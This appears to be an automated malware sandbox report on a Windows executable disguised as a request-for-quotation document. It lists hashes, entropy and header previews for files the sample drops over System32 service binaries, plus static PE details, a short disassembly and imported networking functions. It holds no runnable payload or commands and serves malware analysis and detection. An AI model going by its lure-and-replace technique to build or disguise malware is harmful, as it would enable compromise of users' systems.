SHA-512:	E5F54764F889B5648B766CAF44ECA1B31497F917906B934537BAD2CB4E9AEC154414E77B3D238E2BE507DC90C24D1870FF143A22A5ECFBF91716EA4992F19191
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........................z............................................l............Rich............PE..d.................".................0..........@.......................................... .................................................HL..........(...........................P...T...................P...(... ........................<.......................text...9........................... ..`.rdata..............................@..@.data....:...........p..............@....pdata..............................@..@.didat.......p......................@....rsrc...(............ ..............@..@.reloc...............*..............@...................................................................................................................................................................................................................................

C:\Windows\System32\SensorDataService.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1846784
Entropy (8bit):	6.932792915114502
Encrypted:	false
SSDEEP:	49152:tF2YuHNETovAvNYf8km4JLeQVPyzc+E7xQ2l:46BCf8kH1vcbE7xQ2l
MD5:	FEE7BE523832A1DAA28153EE09159969
SHA1:	592805ADAC7FBD77D3A420260FBBDAD94FE39B09
SHA-256:	94A76E9A41B7D850C7B8E66CB48BDDEF001F205DF37015631C3A71096C238BDE
SHA-512:	B259A3082A088F42E8B48544125670FC81D5C883BB8139A3B2F97C37FC62AE78751CED8FFF4A29487673A7B5A675560EB659B1F55C1DB7D76A7D111E74C0A88E
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W`............yA.K...j...........j.....j.....j.....j.0...j-.....j....Rich...........................PE..d................."......"...(......@..........@.............................p.......b.... .......... .......................................~..H....`..`........................... t..T...........................0w..............Hx..p............................text....!.......".................. ..`.rdata..P^...@...`...&..............@..@.data...............................@....pdata..............................@..@.rsrc...`....`.......6..............@..@.reloc.......p.......>..............@...........................................................................................................................................................................................................................................................

C:\Windows\System32\Spectrum.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1455616
Entropy (8bit):	7.230997825801809
Encrypted:	false
SSDEEP:	24576:kiW6ZvAKF5i/dN9Bde9j9Trk+FwGJ0eeQ2yPyzc+E7xonyVGc/dT5N:kYxF50b9Bdu9TxtJLeQVPyzc+E7xQ2l
MD5:	FC42F22F248DDF97255574928099BD4E
SHA1:	24649B599CBA502441B0E18C22DF2F469C582F6D
SHA-256:	349369D4A91F138E31FD15CA0D9AA51D2B106E120B052FCDB9FA83F3F06B005E
SHA-512:	8FC957E1711B28668525253E2AF544F7E8FA86BA8B993F87034AEF92EFDD5B4D3A6628FE2942A75FA4FCA7CA4D9F997DE7B4052A8EFD62668BC560C2D3E0A53F
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......zq..>...>...>...7h..D...{..4...{..=...>...+...{..9...{..V...{......{n.?...{l.?...{..?...Rich>...........PE..d...)ew..........."................. ~.........@.....................................U.... .......... .................................................. .......@k...................l..T...................@...(...p...............h................................text............................... ..`.rdata.............................@..@.data....8.......*..................@....pdata..@k.......l..................@..@.didat..8....p.......>..............@....rsrc... ............@..............@..@.reloc...............F..............@...........................................................................................................................................................................................................................

C:\Windows\System32\TieringEngineService.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1562112
Entropy (8bit):	5.175307849002714
Encrypted:	false
SSDEEP:	24576:3JnJ5D3WXXGJ0eeQ2yPyzc+E7xonyVGc/dT5N:3JnJ5DGXWJLeQVPyzc+E7xQ2l
MD5:	0EFAE9B5227A7ADB6C73C07C5181848C
SHA1:	BB0D4266CF13BB6DA312BC8E41A6C72E1A21A720
SHA-256:	C89D16F0C2AD5926FEE3CDF279671C75AE165EFAC259064978DFC4352057D7AB
SHA-512:	8865516C5C3CE057255D0166F036435FE3829D3BF065801A075EF709652A3E92B22A2490D8E1000D5F23456D9BA4C0E74DF159FE2115F3E9C9F517C2DA3E3322
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........w............nP.....}.....}........Z...}.....}.....}.....}<....}.....Rich............................PE..d................."............................@.............................."........... .......... ..........................................H...............p....................p..T...................h:..(...P9...............:..@... ...@....................text...\|........................... ..`.rdata.......0......................@..@.data...............................@....pdata..p...........................@..@.didat..............................@....rsrc...............................@..@.reloc.......0......................@...................................................................................................................................................................................................................

C:\Windows\System32\VSSVC.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2075136
Entropy (8bit):	6.73056911190643
Encrypted:	false
SSDEEP:	49152:xPK8mJYTerDjfJ2313e1mP1MdnUhJLeQVPyzc+E7xQ2l:f1vcbE7xQ2l
MD5:	F64A7F0228CA7B00AB6AED1F6D538F70
SHA1:	BD3F29B16FD8DE6037AB0DF222D3FBCEF7B24FEF
SHA-256:	F535C77176EC3EA6EB131C31D930CBE197F370872DF43292031D30B70B6B2A90
SHA-512:	43A8A340E00C2919A07DD7591756C6D6B3CFC5BE37453E79DAF238FC0F7AFFA030A7F95991CFAB288C1D2A950148206575FD2274C7921A2B3B548DB91FEC3F7F
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@.e.!.6.!.6.!.6.YI6.!.6.J.7.!.6.J.7.!.6.!.6. .6.J.7.!.6.J.7.!.6.J.7.!.6.J%6.!.6.J.7.!.6Rich.!.6........PE..d...b.Xw.........."......v...f.......p.........@.............................. .....O..... .......... ..................................................@O...0..lx...................o..T............................................................................text....t.......v.................. ..`.rdata..`\|.......~...z..............@..@.data...............................@....pdata..lx...0...z..................@..@.didat..P............x..............@....rsrc...@O.......P...z..............@..@.reloc..............................@...................................................................................................................................................................................................................................

C:\Windows\System32\alg.exe

Process:	C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1332224
Entropy (8bit):	4.8232017234080775
Encrypted:	false
SSDEEP:	12288:VEP3RnDGJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:WnDGJ0eeQ2yPyzc+E7xonyVGc/dT5N
MD5:	81093F4AEBE45D63048591DC7BC8A814
SHA1:	CB1ACB408B237F5B382A8AEF7B7BD74B16C2A83C
SHA-256:	BA64D5B1F7401EC2394FE0F700D64E352A92C4C70E91848DD189317C820CDD2C
SHA-512:	30D12B9DE5BEB44F6E2FEAD0C46FEFDC51B51157C4554730C814B41BAB8C021C72CFBB8F03E29F4C3763331FDA0ADD4D7DF0DEE15E02CC985C9CEB038C27123B
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,..dB.dB.dB....dB..A.dB..F.dB.dC.,dB..C.dB..G.dB..J.dB....dB..@.dB.Rich.dB.........PE..d...E.~..........."............................@......................................... .......... ......................................`E...............p.. ................... ...T...............................................8...TA.......................text............................... ..`.rdata..rV.......X..................@..@.data........`.......@..............@....pdata.. ....p.......D..............@..@.didat...............R..............@....rsrc............ ...T..............@..@.reloc...............t..............@...................................................................................................................................................................................................................................

C:\Windows\System32\msdtc.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1384960
Entropy (8bit):	4.816911468727054
Encrypted:	false
SSDEEP:	12288:TjkyqGJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:TIyqGJ0eeQ2yPyzc+E7xonyVGc/dT5N
MD5:	84AD1165D1CC1C542C535B1CFAB6AD15
SHA1:	C821A615B71E36EB6C2CA1907103BE690CF1A176
SHA-256:	FE9E869FE8858123E8404B4D03311C79C58039A2C9A782FA64496A9B049A11A6
SHA-512:	C978EDE36233F54D007AF20A968300401A00D4A26366774F7959F9CF80CB98C47DDC02B97CD61DFA2C2630BC2751F08A9602742CEFCD0A33EB154232885E0348
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Voq.Voq.Voq.B.r.Uoq.B.u.Coq._..}oq.B.p.^oq.Vop..oq.B.y.Noq.B.t.Roq.B...Woq.B.s.Woq.RichVoq.........................PE..d......D.........."......h..........0i.........@....................................T}.... ..........@.............................................. ..xx......p...................`...T...........................@...............X...........@....................text....g.......h.................. ..`.rdata..pO.......P...l..............@..@.data....)..........................@....pdata..p...........................@..@.didat.. ...........................@....rsrc...xx... ...z..................@..@.reloc...............B..............@...................................................................................................................................................................................................................

C:\Windows\System32\msiexec.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1306112
Entropy (8bit):	4.740883155962809
Encrypted:	false
SSDEEP:	12288:A4KsGJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:WsGJ0eeQ2yPyzc+E7xonyVGc/dT5N
MD5:	66AB3874C794734AF03CC2F0BAC30184
SHA1:	020E9A0DE7D946697E8431C99456308B7A465645
SHA-256:	DC0FF81A7CB2D9F0047FB055A055955B60CEC691F0D3DF9AAD158CF5CFB94620
SHA-512:	9C85E25B0C9D9D0AF9EDBBD4BDCD64861F96B18CB4FA14BE22C6374A1BE72FC5655DA3E225B02114E01C105292DDC964752BAD99EAC1CFF7FC6E32ED1954EE17
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................................8..............................Rich............PE..d................"...........................@.............................@............ .......... ......................................8........@....... ..........................T.............................................. .......@....................text...!........................... ..`.rdata..:7.......8..................@..@.data....$..........................@....pdata....... ......................@..@.didat.......0......................@....rsrc........@... ..................@..@.reloc.......`......................@...........................................................................................................................................................................................................................................

C:\Windows\System32\snmptrap.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1253376
Entropy (8bit):	4.673197063902164
Encrypted:	false
SSDEEP:	12288:EyAGJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:RAGJ0eeQ2yPyzc+E7xonyVGc/dT5N
MD5:	D48C35119955A40BE97FC32494D6DEB1
SHA1:	D2311C1150229FF41D5C9487D32002EEB2357FA1
SHA-256:	1A0E07343ECB88893160B81B0FF87A1215E87A8EC631E412488A4CA15F9C60CA
SHA-512:	B98410F53055B6E7E6D49B1174256CEFA51311EBC01BDBBE1E0D787FCBC40F8D2D6045146DA14C89CE5D2F1F97A8025A27019DC6EAB2E8B6E803984BAC9D4664
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........^m.^?..^?..^?..JT.._?..JT..\?..JT..M?..JT..W?..^?...?..JT..\?..JT.._?..JT.._?..Rich^?..................PE..d....Ou..........."...... ...&......`'.........@.............................P.......q.... .......... ......................................l8..d....`.......P..,...................p4..T............................0..............(1..X............................text... ........ .................. ..`.rdata.......0.......$..............@..@.data........@.......4..............@....pdata..,....P.......6..............@..@.rsrc........`.......8..............@..@.reloc.......p.......@..............@...........................................................................................................................................................................................................................................................................

C:\Windows\System32\vds.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1303552
Entropy (8bit):	7.163064401862954
Encrypted:	false
SSDEEP:	24576:ZZ0FxT1UoYr99GdcJK7GJ0eeQ2yPyzc+E7xonyVGc/dT5N:HwWs6JLeQVPyzc+E7xQ2l
MD5:	80D7884B22003F22FE0208D240E92F07
SHA1:	1DDC9B75C0D39D06C5303EC37AF3CF7ED8C20B9B
SHA-256:	8094095D878A08899CEF6F3001E622C15561FC976DE92CDBBDFD72BE0624721C
SHA-512:	1BC171D3D46423AF0BECAA8488FA4D3B41317548A79D67FF20F281273939D14B7378FF24122886439A100480641DFA11DD274B48D9D8904CFAC0461779D43A37
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........0..c..c..c..uc...c...b..c...b..c...b..c...b..c..cR..c...b...c...b..c...c..c...b..cRich..c................PE..d................."..........6......@..........@.............................@.......-.... .......... ..................................8#......H....@...........,...................s..T...........................` ..............x!.......{.......................text............................... ..`.rdata..............................@..@.data...............................@....pdata...,..........................@..@.didat.......0......................@....rsrc........@......................@..@.reloc.......P......................@...................................................................................................................................................................................................................

C:\Windows\System32\wbem\WmiApSrv.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1445888
Entropy (8bit):	4.951606030391467
Encrypted:	false
SSDEEP:	24576:9yocDApiGJ0eeQ2yPyzc+E7xonyVGc/dT5N:AocDAplJLeQVPyzc+E7xQ2l
MD5:	C7C1209989B7DF6111BDCB8158CD7012
SHA1:	B3325B2E89BA617B9ED82EE4C773259906F54E13
SHA-256:	64BA4A859B329067EA5585D93AA6B1993ABED6F83F39EF2685B183D1AE2B9559
SHA-512:	E0F7B78928414AAC38D0A0761992C1F7D0B279C3A42C408D7A284FCED6FBF10BE8122A5762A6EBA4F1B721FDD65FB9DA0B5ABD1CB98E1BB2A025D6A529F6326C
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........N]...]...]...T...k...I..^...I..J...]...T...I..Z...I..W...I..h...I..\...I.n.\...I..\...Rich]...........................PE..d...&Gf..........."..........Z......0..........@.............................P .....:b.... .......... ..............................0....%......0....`.. ....0.......................B..T...................h...(...P.......................$........................text...?........................... ..`.rdata..............................@..@.data...............................@....pdata.......0... ..................@..@.didat..(....P.......$..............@....rsrc... ....`.......&..............@..@.reloc.......p.......0..............@...........................................................................................................................................................................................................

C:\Windows\System32\wbengine.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2164736
Entropy (8bit):	7.05639180657712
Encrypted:	false
SSDEEP:	49152:YWcnPqQUGpuphwC0DNLDpaRFXrLuWGMK8IKBJLeQVPyzc+E7xQ2l:60zuNIz1vcbE7xQ2l
MD5:	04B39AF4F8E72AEADC4486811B47C3B7
SHA1:	7D7437C21BC62C7CF33E6092D922F9F482F4640F
SHA-256:	25133D24DCBD2DCF209456D2FE95D8A1B5664B40D79DF9D6A3C51F9C9E730D43
SHA-512:	222410F1731E601DD2BEF0FAF73E48B104CDC2AB5736F9CE117DCB306359D853939A79FC2DBB4CE98D36E0356A29EB0CD14252C1B281947BD04B700BA36214A5
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............M...M...M..L...M..L...M..L...M..L...M...My..M..L4..M..L...M..pM...M..L...MRich...M........PE..d....c..........."..........`...... ..........@.............................`!.......!... .......... ...............................z......h...\|....`...........w..................p...T...................x...(...`................................................text............................... ..`.rdata..............................@..@.data....%..........................@....pdata...w.......x..................@..@.rsrc........`......................@..@.reloc.......p.......(..............@...........................................................................................................................................................................................................................................................................

C:\Windows\Temp\DiagOutputDir\HolographicDevice.etl

Process:	C:\Windows\System32\Spectrum.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.10005826978093514
Encrypted:	false
SSDEEP:	6:Qc7/Q3l/k/uMclF6vMclFq5zwi71NOn+SkUeYDwDzyme/Zj:nzQV/kqF69Fq5zP7O+pawHymO1
MD5:	217507D162F3B6046C2507598D70392E
SHA1:	D003E68FEC6A079C9683908D73AC61C9BC89132E
SHA-256:	5D6BBD2A14126E4C3E0A9120CBA829682A67C425300A6C196A0BC6AB55B5A8E1
SHA-512:	49246E7D50598A00B353AED35C47CE6ED669D1C99245C0FF28E6268267F8E4E679010BD14101085E7949A0A32DB93C043FC051322801AFB81DF999966AD771CD
Malicious:	false
Reputation:	unknown
Preview:	....`...`.......................................`...!...........................\|...x...G>Bj....................eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1..............................................................O................O..........H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e...C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e...e.t.l...........P.P.\|...x...G>Bj....................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\DiagOutputDir\HolographicDeviceHeT.etl

Process:	C:\Windows\System32\Spectrum.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.10141972175807497
Encrypted:	false
SSDEEP:	6:DTI3l/k/uMclF6vMclFq5zwaNMu3n+SkUeYDwDzyMjxb:DTIV/kqF69Fq5zTX+pawHy8F
MD5:	70B75DD76FF06B1B2FC4B1CBDCF22623
SHA1:	9887BB63CE0E1F9341C9435126C06CE74DC21BF1
SHA-256:	5EC019FF46F8367167E905517BCA59C11B434F6BC82419D4A8121F561635B059
SHA-512:	BE8D00F4E99893672CC2FB512F2069E2532865BD6A0218E163ABDC398EB50178E533B00CD99B13E1648054AD7290C700540FBC778E50ABA9E6F7C7665CD94AD4
Malicious:	false
Reputation:	unknown
Preview:	....h...h.......................................h...!...........................\|...x...z`Cj....................eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1..............................................................O..............O..........H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e.H.e.T...C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e.H.e.T...e.t.l.......P.P.\|...x...z`Cj............................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\DiagOutputDir\HolographicShell.etl

Process:	C:\Windows\System32\Spectrum.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.09894005377658292
Encrypted:	false
SSDEEP:	6:uoGQ3Nk/uMclF6vMclFq5zwk1NIn+SkUeYDwDzyPZr:uLQ9kqF69Fq5zBI+pawHyP9
MD5:	28E11F1CBDBD114852E36069C55A3D1B
SHA1:	DB541037A24EA61E5354B38AE8467FEEC2E2866F
SHA-256:	F417170FDA7763F9DA4FCE58FD8DD07078701A5DB5D7F3C9B810A081A71AD974
SHA-512:	6C6FFD1FF8CB34F83B5539D963AFFD55928A2F556208ACFA288BD067CE657D874B2235E9B69CD0B0BA3D71E01AD910751196E73512218CC57CC9148E05D1A80E
Malicious:	false
Reputation:	unknown
Preview:	....X...X.......................................X...!...........................\|...x...(.Bj....................eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1..............................................................O...............O..........H.o.l.o.g.r.a.p.h.i.c.S.h.e.l.l...C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.H.o.l.o.g.r.a.p.h.i.c.S.h.e.l.l...e.t.l.......P.P.\|...x...(.Bj............................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.392445518287452
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	REQUEST FOR QUOTATION 1307-RFQ.exe
File size:	1'553'920 bytes
MD5:	821aec135ea3aa8e02fab9d0cc783a0b
SHA1:	67a03996c124db163d83a179f8a517e63d45f742
SHA256:	a5d810f05768fff1eeba5ceeb410a0d4d61271fa12c7b5a88251fc1e391f453a
SHA512:	fb1bf2b68bee1dedee3ab5cfeb66b2b05cbc9ae69c5edb5ce4f7701e1acad2885b2d355f40c5c70ae6291fa629de2d1925428b8a8b94d34cf6a6bdeca6681029
SSDEEP:	24576:ku6J3UO0c+JY5UZ+XC0kGso6Fa+R1yiEWYBGJ0eeQ2yPyzc+E7xonyVGc/dT5N:eZ0c++OCvkGs9Fa+R1yoYsJLeQVPyzcZ
TLSH:	D575E02263DDC360CB769173BF2AB7016EBF7C614630B95B2F980D7DA960161122D7A3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x427dcd
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x67577E20 [Mon Dec 9 23:32:48 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007F2550B7AB3Ah
jmp 00007F2550B6D904h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F2550B6DA8Ah
cmp edi, eax
jc 00007F2550B6DDEEh
bt dword ptr [004C31FCh], 01h
jnc 00007F2550B6DA89h
rep movsb
jmp 00007F2550B6DD9Ch
cmp ecx, 00000080h
jc 00007F2550B6DC54h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F2550B6DA90h
bt dword ptr [004BE324h], 01h
jc 00007F2550B6DF60h
bt dword ptr [004C31FCh], 00000000h
jnc 00007F2550B6DC2Dh
test edi, 00000003h
jne 00007F2550B6DC3Eh
test esi, 00000003h
jne 00007F2550B6DC1Dh
bt edi, 02h
jnc 00007F2550B6DA8Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F2550B6DA93h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F2550B6DAE5h
bt esi, 03h
jnc 00007F2550B6DB38h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD4 build 31101
[RES] VS2013 build 21005
[LNK] VS2013 UPD4 build 31101

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xba44c	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc7000	0x24f98	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4870	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dcc4	0x8de00	e4e4621c73040e5bf9386bc16ab805a0	False	0.5728661894273128	data	6.676118515745593	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2e10e	0x2e200	79b14b254506b0dbc8cd0ad67fb70ad9	False	0.33535526761517614	OpenPGP Public Key	5.76010872795207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbe000	0x8f74	0x5200	9f9d6f746f1a415a63de45f8b7983d33	False	0.1017530487804878	data	1.198745897703538	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc7000	0x24f98	0x25000	9377d72e1b7f76fbcb71325ba698dc77	False	0.8228132918074325	data	7.6050258517843545	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xec000	0x96000	0x95000	1abc45260ebd63eb6d52df6b739b21d4	False	0.9738212431837249	data	7.920466674151345	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc75a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc76d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc77f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc7920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc7c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc7d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc8bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc9480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc99e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xcbf90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xcd038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xcd4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xcd4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcda84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xce110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xce5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xceb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcf1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcf660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcf7b8	0x1c25e	data			1.0003989799989592
RT_GROUP_ICON	0xeba18	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0xeba90	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0xebaa4	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0xebab8	0x14	data	English	Great Britain	1.25
RT_VERSION	0xebacc	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0xebba8	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
